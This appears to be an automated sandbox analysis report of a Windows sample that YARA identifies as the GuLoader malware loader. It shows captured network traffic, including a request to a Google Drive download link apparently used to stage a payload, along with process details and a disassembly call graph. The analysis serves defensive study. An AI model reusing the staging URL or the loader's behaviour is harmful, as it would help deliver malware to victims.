                                                        67192.168.11.2049818142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:09:10 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:09:11 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:09:11 GMT
                                                        Content-Security-Policy: script-src 'nonce-Z6Q_FmnFJaZSLffzj_ChMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6lK0iXxMxjMi6r9ogofdF2Zt-a6T6m6XJsjDQxQ_ve_aSxvSIsOqCEKQILNpwTMKXTMk8
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:09:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 39 6c 43 39 67 70 39 65 56 6b 53 50 45 47 70 4e 66 39 68 32 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V9lC9gp9eVkSPEGpNf9h2Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:11:00:50
                                                        Start date:05/12/2024
                                                        Path:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\fbXZ4ErQMU.exe"
                                                        Imagebase:0x400000
                                                        File size:901'168 bytes
                                                        MD5 hash:C58B26E27E2D9AA8080E289445E1C8CA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.53292835357.0000000002C0F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:11:02:52
                                                        Start date:05/12/2024
                                                        Path:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\fbXZ4ErQMU.exe"
                                                        Imagebase:0x400000
                                                        File size:901'168 bytes
                                                        MD5 hash:C58B26E27E2D9AA8080E289445E1C8CA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.56492873526.000000000183F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:19.8%
                                                          Dynamic/Decrypted Code Coverage:13.9%
                                                          Signature Coverage:16.4%
                                                          Total number of Nodes:1543
                                                          Total number of Limit Nodes:47
                                                          execution_graph 4889 401d44 4890 402bac 17 API calls 4889->4890 4891 401d52 SetWindowLongA 4890->4891 4892 402a5a 4891->4892 3864 401ec5 3872 402bac 3864->3872 3866 401ecb 3867 402bac 17 API calls 3866->3867 3868 401ed7 3867->3868 3869 401ee3 ShowWindow 3868->3869 3870 401eee EnableWindow 3868->3870 3871 402a5a 3869->3871 3870->3871 3875 40618a 3872->3875 3874 402bc1 3874->3866 3876 406197 3875->3876 3877 4063b9 3876->3877 3880 406393 lstrlenA 3876->3880 3881 40618a 10 API calls 3876->3881 3884 4062af GetSystemDirectoryA 3876->3884 3886 4062c2 GetWindowsDirectoryA 3876->3886 3888 40618a 10 API calls 3876->3888 3889 40633c lstrcatA 3876->3889 3890 4062f6 SHGetSpecialFolderLocation 3876->3890 3892 405fde 3876->3892 3897 4063d2 3876->3897 3906 406055 wsprintfA 3876->3906 3907 4060f7 lstrcpynA 3876->3907 3878 4063ce 3877->3878 3908 4060f7 lstrcpynA 3877->3908 3878->3874 3880->3876 3881->3880 3884->3876 3886->3876 3888->3876 3889->3876 3890->3876 3891 40630e SHGetPathFromIDListA CoTaskMemFree 3890->3891 3891->3876 3909 405f7d 3892->3909 3895 406012 RegQueryValueExA RegCloseKey 3896 406041 3895->3896 3896->3876 3904 4063de 3897->3904 3898 40644a CharPrevA 3902 406446 3898->3902 3899 40643b CharNextA 3899->3902 3899->3904 3900 406465 3900->3876 3902->3898 3902->3900 3903 406429 CharNextA 3903->3904 3904->3899 3904->3902 3904->3903 3905 406436 CharNextA 3904->3905 3913 405aba 3904->3913 3905->3899 3906->3876 3907->3876 3908->3878 3910 405f8c 3909->3910 3911 405f90 3910->3911 3912 405f95 RegOpenKeyExA 3910->3912 3911->3895 3911->3896 3912->3911 3914 405ac0 3913->3914 3915 405ad3 3914->3915 3916 405ac6 CharNextA 3914->3916 3915->3904 3916->3914 4893 70051000 4896 7005101b 4893->4896 4903 700514bb 4896->4903 4898 70051020 4899 70051024 4898->4899 4900 70051027 GlobalAlloc 4898->4900 4901 700514e2 3 API calls 4899->4901 4900->4899 4902 70051019 4901->4902 4905 700514c1 4903->4905 4904 700514c7 4904->4898 4905->4904 4906 700514d3 GlobalFree 4905->4906 4906->4898 3917 401746 3923 402bce 3917->3923 3921 401754 3922 405cbf 2 API calls 3921->3922 3922->3921 3924 402bda 3923->3924 3925 40618a 17 API calls 3924->3925 3926 402bfb 3925->3926 3927 40174d 3926->3927 3928 4063d2 5 API calls 3926->3928 3929 405cbf 3927->3929 3928->3927 3930 405cca GetTickCount GetTempFileNameA 3929->3930 3931 405cfb 3930->3931 3932 405cf7 3930->3932 3931->3921 3932->3930 3932->3931 4907 4045c6 4908 4045d6 4907->4908 4909 4045fc 4907->4909 4914 40417b 4908->4914 4917 4041e2 4909->4917 4912 4045e3 SetDlgItemTextA 4912->4909 4915 40618a 17 API calls 4914->4915 4916 404186 SetDlgItemTextA 4915->4916 4916->4912 4918 4042a5 4917->4918 4919 4041fa GetWindowLongA 4917->4919 4919->4918 4920 40420f 4919->4920 4920->4918 4921 40423c GetSysColor 4920->4921 4922 40423f 4920->4922 4921->4922 4923 404245 SetTextColor 4922->4923 4924 40424f SetBkMode 4922->4924 4923->4924 4925 404267 GetSysColor 4924->4925 4926 40426d 4924->4926 4925->4926 4927 404274 SetBkColor 4926->4927 4928 40427e 4926->4928 4927->4928 4928->4918 4929 404291 DeleteObject 4928->4929 4930 404298 CreateBrushIndirect 4928->4930 4929->4930 4930->4918 4931 401947 4932 402bce 17 API calls 4931->4932 4933 40194e lstrlenA 4932->4933 4934 402620 4933->4934 3960 403348 SetErrorMode GetVersion 3961 403389 3960->3961 3962 40338f 3960->3962 3963 406500 5 API calls 3961->3963 4050 406492 GetSystemDirectoryA 3962->4050 3963->3962 3965 4033a5 lstrlenA 3965->3962 3966 4033b4 3965->3966 4053 406500 GetModuleHandleA 3966->4053 3969 406500 5 API calls 3970 4033c2 3969->3970 3971 406500 5 API calls 3970->3971 3972 4033ce #17 OleInitialize SHGetFileInfoA 3971->3972 4059 4060f7 lstrcpynA 3972->4059 3975 40341a GetCommandLineA 4060 4060f7 lstrcpynA 3975->4060 3977 40342c 3978 405aba CharNextA 3977->3978 3979 403455 CharNextA 3978->3979 3987 403465 3979->3987 3980 40352f 3981 403542 GetTempPathA 3980->3981 4061 403317 3981->4061 3983 40355a 3984 4035b4 DeleteFileA 3983->3984 3985 40355e GetWindowsDirectoryA lstrcatA 3983->3985 4071 402ea1 GetTickCount GetModuleFileNameA 3984->4071 3988 403317 12 API calls 3985->3988 3986 405aba CharNextA 3986->3987 3987->3980 3987->3986 3991 403531 3987->3991 3990 40357a 3988->3990 3990->3984 3994 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3990->3994 4156 4060f7 lstrcpynA 3991->4156 3992 4035c8 3995 40365e 3992->3995 3996 40364e 3992->3996 4000 405aba CharNextA 3992->4000 3998 403317 12 API calls 3994->3998 4173 403830 3995->4173 4099 40390a 3996->4099 4002 4035ac 3998->4002 4003 4035e3 4000->4003 4002->3984 4002->3995 4010 403629 4003->4010 4011 40368e 4003->4011 4004 403796 4007 403818 ExitProcess 4004->4007 4008 40379e GetCurrentProcess OpenProcessToken 4004->4008 4005 403678 4006 405813 MessageBoxIndirectA 4005->4006 4012 403686 ExitProcess 4006->4012 4013 4037e9 4008->4013 4014 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 4008->4014 4157 405b7d 4010->4157 4180 40577e 4011->4180 4017 406500 5 API calls 4013->4017 4014->4013 4020 4037f0 4017->4020 4023 403805 ExitWindowsEx 4020->4023 4024 403811 4020->4024 4021 4036a4 lstrcatA 4022 4036af lstrcatA lstrcmpiA 4021->4022 4022->3995 4026 4036cb 4022->4026 4023->4007 4023->4024 4200 40140b 4024->4200 4029 4036d0 4026->4029 4030 4036d7 4026->4030 4028 403643 4172 4060f7 lstrcpynA 4028->4172 4183 4056e4 CreateDirectoryA 4029->4183 4188 405761 CreateDirectoryA 4030->4188 4035 4036dc SetCurrentDirectoryA 4036 4036f6 4035->4036 4037 4036eb 4035->4037 4192 4060f7 lstrcpynA 4036->4192 4191 4060f7 lstrcpynA 4037->4191 4040 40618a 17 API calls 4041 403735 DeleteFileA 4040->4041 4042 403742 CopyFileA 4041->4042 4047 403704 4041->4047 4042->4047 4043 40378a 4044 405ed6 36 API calls 4043->4044 4044->3995 4046 40618a 17 API calls 4046->4047 4047->4040 4047->4043 4047->4046 4049 403776 CloseHandle 4047->4049 4193 405ed6 MoveFileExA 4047->4193 4197 405796 CreateProcessA 4047->4197 4049->4047 4051 4064b4 wsprintfA LoadLibraryExA 4050->4051 4051->3965 4054 406526 GetProcAddress 4053->4054 4055 40651c 4053->4055 4057 4033bb 4054->4057 4056 406492 3 API calls 4055->4056 4058 406522 4056->4058 4057->3969 4058->4054 4058->4057 4059->3975 4060->3977 4062 4063d2 5 API calls 4061->4062 4064 403323 4062->4064 4063 40332d 4063->3983 4064->4063 4203 405a8f lstrlenA CharPrevA 4064->4203 4067 405761 2 API calls 4068 40333b 4067->4068 4069 405cbf 2 API calls 4068->4069 4070 403346 4069->4070 4070->3983 4206 405c90 GetFileAttributesA CreateFileA 4071->4206 4073 402ee1 4074 402ef1 4073->4074 4207 4060f7 lstrcpynA 4073->4207 4074->3992 4076 402f07 4208 405ad6 lstrlenA 4076->4208 4080 402f18 GetFileSize 4095 403012 4080->4095 4098 402f2f 4080->4098 4082 40301b 4082->4074 4084 40304b GlobalAlloc 4082->4084 4248 403300 SetFilePointer 4082->4248 4224 403300 SetFilePointer 4084->4224 4085 40307e 4089 402e3d 6 API calls 4085->4089 4088 403066 4225 4030d8 4088->4225 4089->4074 4090 403034 4092 4032ea ReadFile 4090->4092 4094 40303f 4092->4094 4093 402e3d 6 API calls 4093->4098 4094->4074 4094->4084 4213 402e3d 4095->4213 4096 403072 4096->4074 4096->4096 4097 4030af SetFilePointer 4096->4097 4097->4074 4098->4074 4098->4085 4098->4093 4098->4095 4245 4032ea 4098->4245 4100 406500 5 API calls 4099->4100 4101 40391e 4100->4101 4102 403924 4101->4102 4103 403936 4101->4103 4277 406055 wsprintfA 4102->4277 4104 405fde 3 API calls 4103->4104 4105 403961 4104->4105 4107 40397f lstrcatA 4105->4107 4108 405fde 3 API calls 4105->4108 4109 403934 4107->4109 4108->4107 4269 403bcf 4109->4269 4112 405b7d 18 API calls 4113 4039b1 4112->4113 4114 403a3a 4113->4114 4116 405fde 3 API calls 4113->4116 4115 405b7d 18 API calls 4114->4115 4117 403a40 4115->4117 4118 4039dd 4116->4118 4119 403a50 LoadImageA 4117->4119 4120 40618a 17 API calls 4117->4120 4118->4114 4125 4039f9 lstrlenA 4118->4125 4129 405aba CharNextA 4118->4129 4121 403af6 4119->4121 4122 403a77 RegisterClassA 4119->4122 4120->4119 4124 40140b 2 API calls 4121->4124 4123 403aad SystemParametersInfoA CreateWindowExA 4122->4123 4155 403b00 4122->4155 4123->4121 4128 403afc 4124->4128 4126 403a07 lstrcmpiA 4125->4126 4127 403a2d 4125->4127 4126->4127 4130 403a17 GetFileAttributesA 4126->4130 4131 405a8f 3 API calls 4127->4131 4134 403bcf 18 API calls 4128->4134 4128->4155 4132 4039f7 4129->4132 4133 403a23 4130->4133 4135 403a33 4131->4135 4132->4125 4133->4127 4136 405ad6 2 API calls 4133->4136 4137 403b0d 4134->4137 4278 4060f7 lstrcpynA 4135->4278 4136->4127 4139 403b19 ShowWindow 4137->4139 4140 403b9c 4137->4140 4142 406492 3 API calls 4139->4142 4279 4052f0 OleInitialize 4140->4279 4144 403b31 4142->4144 4143 403ba2 4145 403ba6 4143->4145 4146 403bbe 4143->4146 4147 403b3f GetClassInfoA 4144->4147 4149 406492 3 API calls 4144->4149 4153 40140b 2 API calls 4145->4153 4145->4155 4148 40140b 2 API calls 4146->4148 4150 403b53 GetClassInfoA RegisterClassA 4147->4150 4151 403b69 DialogBoxParamA 4147->4151 4148->4155 4149->4147 4150->4151 4152 40140b 2 API calls 4151->4152 4154 403b91 4152->4154 4153->4155 4154->4155 4155->3995 4156->3981 4297 4060f7 lstrcpynA 4157->4297 4159 405b8e 4298 405b28 CharNextA CharNextA 4159->4298 4162 403634 4162->3995 4171 4060f7 lstrcpynA 4162->4171 4163 4063d2 5 API calls 4166 405ba4 4163->4166 4164 405bcf lstrlenA 4165 405bda 4164->4165 4164->4166 4168 405a8f 3 API calls 4165->4168 4166->4162 4166->4164 4170 405ad6 2 API calls 4166->4170 4304 40646b FindFirstFileA 4166->4304 4169 405bdf GetFileAttributesA 4168->4169 4169->4162 4170->4164 4171->4028 4172->3996 4174 403848 4173->4174 4175 40383a CloseHandle 4173->4175 4307 403875 4174->4307 4175->4174 4181 406500 5 API calls 4180->4181 4182 403693 lstrcatA 4181->4182 4182->4021 4182->4022 4184 4036d5 4183->4184 4185 405735 GetLastError 4183->4185 4184->4035 4185->4184 4186 405744 SetFileSecurityA 4185->4186 4186->4184 4187 40575a GetLastError 4186->4187 4187->4184 4189 405771 4188->4189 4190 405775 GetLastError 4188->4190 4189->4035 4190->4189 4191->4036 4192->4047 4194 405ef7 4193->4194 4195 405eea 4193->4195 4194->4047 4364 405d66 4195->4364 4198 4057d5 4197->4198 4199 4057c9 CloseHandle 4197->4199 4198->4047 4199->4198 4201 401389 2 API calls 4200->4201 4202 401420 4201->4202 4202->4007 4204 403335 4203->4204 4205 405aa9 lstrcatA 4203->4205 4204->4067 4205->4204 4206->4073 4207->4076 4209 405ae3 4208->4209 4210 402f0d 4209->4210 4211 405ae8 CharPrevA 4209->4211 4212 4060f7 lstrcpynA 4210->4212 4211->4209 4211->4210 4212->4080 4214 402e46 4213->4214 4215 402e5e 4213->4215 4216 402e56 4214->4216 4217 402e4f DestroyWindow 4214->4217 4218 402e66 4215->4218 4219 402e6e GetTickCount 4215->4219 4216->4082 4217->4216 4249 40653c 4218->4249 4221 402e7c CreateDialogParamA ShowWindow 4219->4221 4222 402e9f 4219->4222 4221->4222 4222->4082 4224->4088 4226 4030ee 4225->4226 4227 40311c 4226->4227 4255 403300 SetFilePointer 4226->4255 4229 4032ea ReadFile 4227->4229 4230 403127 4229->4230 4231 403283 4230->4231 4232 403139 GetTickCount 4230->4232 4238 40326d 4230->4238 4233 4032c5 4231->4233 4234 403287 4231->4234 4235 403188 4232->4235 4232->4238 4237 4032ea ReadFile 4233->4237 4234->4238 4239 4032ea ReadFile 4234->4239 4240 405d37 WriteFile 4234->4240 4236 4032ea ReadFile 4235->4236 4235->4238 4241 4031de GetTickCount 4235->4241 4242 403203 MulDiv wsprintfA 4235->4242 4253 405d37 WriteFile 4235->4253 4236->4235 4237->4238 4238->4096 4239->4234 4240->4234 4241->4235 4256 40521e 4242->4256 4267 405d08 ReadFile 4245->4267 4248->4090 4250 406559 PeekMessageA 4249->4250 4251 402e6c 4250->4251 4252 40654f DispatchMessageA 4250->4252 4251->4082 4252->4250 4254 405d55 4253->4254 4254->4235 4255->4227 4257 405239 4256->4257 4266 4052dc 4256->4266 4258 405256 lstrlenA 4257->4258 4259 40618a 17 API calls 4257->4259 4260 405264 lstrlenA 4258->4260 4261 40527f 4258->4261 4259->4258 4262 405276 lstrcatA 4260->4262 4260->4266 4263 405292 4261->4263 4264 405285 SetWindowTextA 4261->4264 4262->4261 4265 405298 SendMessageA SendMessageA SendMessageA 4263->4265 4263->4266 4264->4263 4265->4266 4266->4235 4268 4032fd 4267->4268 4268->4098 4270 403be3 4269->4270 4286 406055 wsprintfA 4270->4286 4272 403c54 4287 403c88 4272->4287 4274 40398f 4274->4112 4275 403c59 4275->4274 4276 40618a 17 API calls 4275->4276 4276->4275 4277->4109 4278->4114 4290 4041c7 4279->4290 4281 4041c7 SendMessageA 4283 40534c OleUninitialize 4281->4283 4282 405313 4285 40533a 4282->4285 4293 401389 4282->4293 4283->4143 4285->4281 4286->4272 4288 40618a 17 API calls 4287->4288 4289 403c96 SetWindowTextA 4288->4289 4289->4275 4291 4041d0 SendMessageA 4290->4291 4292 4041df 4290->4292 4291->4292 4292->4282 4295 401390 4293->4295 4294 4013fe 4294->4282 4295->4294 4296 4013cb MulDiv SendMessageA 4295->4296 4296->4295 4297->4159 4299 405b43 4298->4299 4301 405b53 4298->4301 4299->4301 4302 405b4e CharNextA 4299->4302 4300 405b73 4300->4162 4300->4163 4301->4300 4303 405aba CharNextA 4301->4303 4302->4300 4303->4301 4305 406481 FindClose 4304->4305 4306 40648c 4304->4306 4305->4306 4306->4166 4308 403883 4307->4308 4309 403888 FreeLibrary GlobalFree 4308->4309 4310 40384d 4308->4310 4309->4309 4309->4310 4311 4058bf 4310->4311 4312 405b7d 18 API calls 4311->4312 4313 4058df 4312->4313 4314 4058e7 DeleteFileA 4313->4314 4315 4058fe 4313->4315 4316 403667 OleUninitialize 4314->4316 4317 405a2c 4315->4317 4351 4060f7 lstrcpynA 4315->4351 4316->4004 4316->4005 4317->4316 4322 40646b 2 API calls 4317->4322 4319 405924 4320 405937 4319->4320 4321 40592a lstrcatA 4319->4321 4324 405ad6 2 API calls 4320->4324 4323 40593d 4321->4323 4325 405a50 4322->4325 4326 40594b lstrcatA 4323->4326 4328 405956 lstrlenA FindFirstFileA 4323->4328 4324->4323 4325->4316 4327 405a54 4325->4327 4326->4328 4329 405a8f 3 API calls 4327->4329 4328->4317 4333 40597a 4328->4333 4330 405a5a 4329->4330 4332 405877 5 API calls 4330->4332 4331 405aba CharNextA 4331->4333 4334 405a66 4332->4334 4333->4331 4336 405a0b FindNextFileA 4333->4336 4347 4059cc 4333->4347 4352 4060f7 lstrcpynA 4333->4352 4335 405a80 4334->4335 4338 405a6a 4334->4338 4339 40521e 24 API calls 4335->4339 4336->4333 4340 405a23 FindClose 4336->4340 4338->4316 4341 40521e 24 API calls 4338->4341 4339->4316 4340->4317 4342 405a77 4341->4342 4343 405ed6 36 API calls 4342->4343 4346 405a7e 4343->4346 4345 4058bf 60 API calls 4345->4347 4346->4316 4347->4336 4347->4345 4348 40521e 24 API calls 4347->4348 4349 40521e 24 API calls 4347->4349 4350 405ed6 36 API calls 4347->4350 4353 405877 4347->4353 4348->4336 4349->4347 4350->4347 4351->4319 4352->4333 4361 405c6b GetFileAttributesA 4353->4361 4356 4058a4 4356->4347 4357 405892 RemoveDirectoryA 4359 4058a0 4357->4359 4358 40589a DeleteFileA 4358->4359 4359->4356 4360 4058b0 SetFileAttributesA 4359->4360 4360->4356 4362 405883 4361->4362 4363 405c7d SetFileAttributesA 4361->4363 4362->4356 4362->4357 4362->4358 4363->4362 4365 405db2 GetShortPathNameA 4364->4365 4366 405d8c 4364->4366 4367 405ed1 4365->4367 4368 405dc7 4365->4368 4391 405c90 GetFileAttributesA CreateFileA 4366->4391 4367->4194 4368->4367 4371 405dcf wsprintfA 4368->4371 4370 405d96 CloseHandle GetShortPathNameA 4370->4367 4372 405daa 4370->4372 4373 40618a 17 API calls 4371->4373 4372->4365 4372->4367 4374 405df7 4373->4374 4392 405c90 GetFileAttributesA CreateFileA 4374->4392 4376 405e04 4376->4367 4377 405e13 GetFileSize GlobalAlloc 4376->4377 4378 405e35 4377->4378 4379 405eca CloseHandle 4377->4379 4380 405d08 ReadFile 4378->4380 4379->4367 4381 405e3d 4380->4381 4381->4379 4393 405bf5 lstrlenA 4381->4393 4384 405e54 lstrcpyA 4386 405e76 4384->4386 4385 405e68 4387 405bf5 4 API calls 4385->4387 4388 405ead SetFilePointer 4386->4388 4387->4386 4389 405d37 WriteFile 4388->4389 4390 405ec3 GlobalFree 4389->4390 4390->4379 4391->4370 4392->4376 4394 405c36 lstrlenA 4393->4394 4395 405c3e 4394->4395 4396 405c0f lstrcmpiA 4394->4396 4395->4384 4395->4385 4396->4395 4397 405c2d CharNextA 4396->4397 4397->4394 4935 4038c8 4936 4038d3 4935->4936 4937 4038d7 4936->4937 4938 4038da GlobalAlloc 4936->4938 4938->4937 4942 401fcb 4943 402bce 17 API calls 4942->4943 4944 401fd2 4943->4944 4945 40646b 2 API calls 4944->4945 4946 401fd8 4945->4946 4948 401fea 4946->4948 4949 406055 wsprintfA 4946->4949 4949->4948 4419 4014d6 4420 402bac 17 API calls 4419->4420 4421 4014dc Sleep 4420->4421 4423 402a5a 4421->4423 4436 401759 4437 402bce 17 API calls 4436->4437 4438 401760 4437->4438 4439 401786 4438->4439 4440 40177e 4438->4440 4477 4060f7 lstrcpynA 4439->4477 4476 4060f7 lstrcpynA 4440->4476 4443 401784 4447 4063d2 5 API calls 4443->4447 4444 401791 4445 405a8f 3 API calls 4444->4445 4446 401797 lstrcatA 4445->4446 4446->4443 4454 4017a3 4447->4454 4448 40646b 2 API calls 4448->4454 4449 4017e4 4450 405c6b 2 API calls 4449->4450 4450->4454 4452 4017ba CompareFileTime 4452->4454 4453 40187e 4455 40521e 24 API calls 4453->4455 4454->4448 4454->4449 4454->4452 4454->4453 4459 4060f7 lstrcpynA 4454->4459 4462 40618a 17 API calls 4454->4462 4470 405813 MessageBoxIndirectA 4454->4470 4474 401855 4454->4474 4475 405c90 GetFileAttributesA CreateFileA 4454->4475 4457 401888 4455->4457 4456 40521e 24 API calls 4472 40186a 4456->4472 4458 4030d8 31 API calls 4457->4458 4460 40189b 4458->4460 4459->4454 4461 4018af SetFileTime 4460->4461 4463 4018c1 CloseHandle 4460->4463 4461->4463 4462->4454 4464 4018d2 4463->4464 4463->4472 4465 4018d7 4464->4465 4466 4018ea 4464->4466 4468 40618a 17 API calls 4465->4468 4467 40618a 17 API calls 4466->4467 4469 4018f2 4467->4469 4471 4018df lstrcatA 4468->4471 4469->4472 4473 405813 MessageBoxIndirectA 4469->4473 4470->4454 4471->4469 4473->4472 4474->4456 4474->4472 4475->4454 4476->4443 4477->4444 4950 401959 4951 402bac 17 API calls 4950->4951 4952 401960 4951->4952 4953 402bac 17 API calls 4952->4953 4954 40196d 4953->4954 4955 402bce 17 API calls 4954->4955 4956 401984 lstrlenA 4955->4956 4958 401994 4956->4958 4957 4019d4 4958->4957 4962 4060f7 lstrcpynA 4958->4962 4960 4019c4 4960->4957 4961 4019c9 lstrlenA 4960->4961 4961->4957 4962->4960 4963 40535c 4964 405507 4963->4964 4965 40537e GetDlgItem GetDlgItem GetDlgItem 4963->4965 4967 405537 4964->4967 4968 40550f GetDlgItem CreateThread CloseHandle 4964->4968 5008 4041b0 SendMessageA 4965->5008 4969 405586 4967->4969 4970 40554d ShowWindow ShowWindow 4967->4970 4971 405565 4967->4971 4968->4967 4976 4041e2 8 API calls 4969->4976 5010 4041b0 SendMessageA 4970->5010 4974 405575 4971->4974 4975 405599 ShowWindow 4971->4975 4978 4055c0 4971->4978 4972 4053ee 4977 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4972->4977 5011 404154 4974->5011 4982 4055b9 4975->4982 4983 4055ab 4975->4983 4981 405592 4976->4981 4984 405463 4977->4984 4985 405447 SendMessageA SendMessageA 4977->4985 4978->4969 4979 4055cd SendMessageA 4978->4979 4979->4981 4986 4055e6 CreatePopupMenu 4979->4986 4990 404154 SendMessageA 4982->4990 4989 40521e 24 API calls 4983->4989 4987 405476 4984->4987 4988 405468 SendMessageA 4984->4988 4985->4984 4991 40618a 17 API calls 4986->4991 4992 40417b 18 API calls 4987->4992 4988->4987 4989->4982 4990->4978 4993 4055f6 AppendMenuA 4991->4993 4994 405486 4992->4994 4995 405614 GetWindowRect 4993->4995 4996 405627 TrackPopupMenu 4993->4996 4997 4054c3 GetDlgItem SendMessageA 4994->4997 4998 40548f ShowWindow 4994->4998 4995->4996 4996->4981 4999 405643 4996->4999 4997->4981 5001 4054ea SendMessageA SendMessageA 4997->5001 5000 4054a5 ShowWindow 4998->5000 5003 4054b2 4998->5003 5002 405662 SendMessageA 4999->5002 5000->5003 5001->4981 5002->5002 5004 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5002->5004 5009 4041b0 SendMessageA 5003->5009 5006 4056a1 SendMessageA 5004->5006 5006->5006 5007 4056c3 GlobalUnlock SetClipboardData CloseClipboard 5006->5007 5007->4981 5008->4972 5009->4997 5010->4971 5012 404161 SendMessageA 5011->5012 5013 40415b 5011->5013 5012->4969 5013->5012 5014 40275d 5015 402763 5014->5015 5016 402a5a 5015->5016 5017 40276b FindClose 5015->5017 5017->5016 5018 401a5e 5019 402bac 17 API calls 5018->5019 5020 401a67 5019->5020 5021 402bac 17 API calls 5020->5021 5022 401a0e 5021->5022 5023 40495e 5024 40498a 5023->5024 5025 40496e 5023->5025 5027 404990 SHGetPathFromIDListA 5024->5027 5028 4049bd 5024->5028 5034 4057f7 GetDlgItemTextA 5025->5034 5030 4049a0 5027->5030 5031 4049a7 SendMessageA 5027->5031 5029 40497b SendMessageA 5029->5024 5032 40140b 2 API calls 5030->5032 5031->5028 5032->5031 5034->5029 5035 4029de 5036 406500 5 API calls 5035->5036 5037 4029e5 5036->5037 5038 402bce 17 API calls 5037->5038 5039 4029ee 5038->5039 5041 402a2a 5039->5041 5045 40614a 5039->5045 5042 4029fc 5042->5041 5049 406134 5042->5049 5047 406155 5045->5047 5046 406178 IIDFromString 5046->5042 5047->5046 5048 406171 5047->5048 5048->5042 5052 